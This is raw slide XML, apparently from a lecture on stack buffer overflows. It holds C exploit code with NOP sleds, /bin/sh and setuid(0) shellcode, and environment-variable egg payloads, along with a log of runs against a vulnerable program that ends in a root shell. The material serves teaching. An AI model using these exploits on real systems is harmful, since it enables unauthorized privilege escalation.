              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  "\x80\xe8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xdc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>unsigned long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>get_sp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(void) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>   __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>asm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>__("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>void main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  char *buff, *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  long *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>addr_ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> offset=DEFAULT_OFFSET, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>bsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>=DEFAULT_BUFFER_SIZE;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> &gt; 1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>bsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>atoi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> &gt; 2) offset = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>atoi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>[2]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  if (!(buff = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>bsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>))) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>("Can't allocate memory.\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    exit(0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>get_sp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>() - offset;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>("Using address: 0x%x\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> = buff;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>addr_ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> = (long *) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nn-NO" altLang="en-US" b="1" dirty="0"/>
              <a:t>  for (i = 0; i &lt; bsize; i+=4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    *(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>addr_ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>++) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nn-NO" altLang="en-US" b="1" dirty="0"/>
              <a:t>  for (i = 0; i &lt; bsize/2; i++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    buff[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>] = NOP;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> = buff + ((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>bsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>/2) - (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(shellcode)/2));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(shellcode); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    *(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>++) = shellcode[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  buff[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>bsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> - 1] = '\0';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>buff,"EGG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>=",4);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>putenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(buff);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  system("/bin/bash");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59396" name="投影片編號版面配置區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4A24A3B5-0F86-488B-BD59-A2135080B7B4}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>21</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投影片圖像版面配置區 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60419" name="備忘稿版面配置區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b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>In the code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>egg  "EGG=&lt;NOP&gt;&lt;NOP&gt;…&lt;NOP&gt;&lt;shellcode&gt;\0"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>buff  "RET=&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>&gt;…&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>&gt;\0"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>(may have to try different values or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>relogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>./exploit4 700</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Using address: 0xbffff408</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>./vulnerable $RET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>Segmentation fault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>./exploit4 800</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Using address 0xbfffe188</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>sh-2.05b#</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-HK" altLang="zh-TW" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" u="sng" dirty="0"/>
              <a:t>exploit4.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>stdlib.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>#define DEFAULT_OFFSET                    0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>#define DEFAULT_BUFFER_SIZE             512</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>#define DEFAULT_EGG_SIZE               2048</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>#define NOP                            0x90</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>char shellcode[] =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  "\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>\x89\xd8\xb0\x17\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>\x80" /*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(0) (will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" baseline="0" dirty="0"/>
              <a:t> be explained later)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
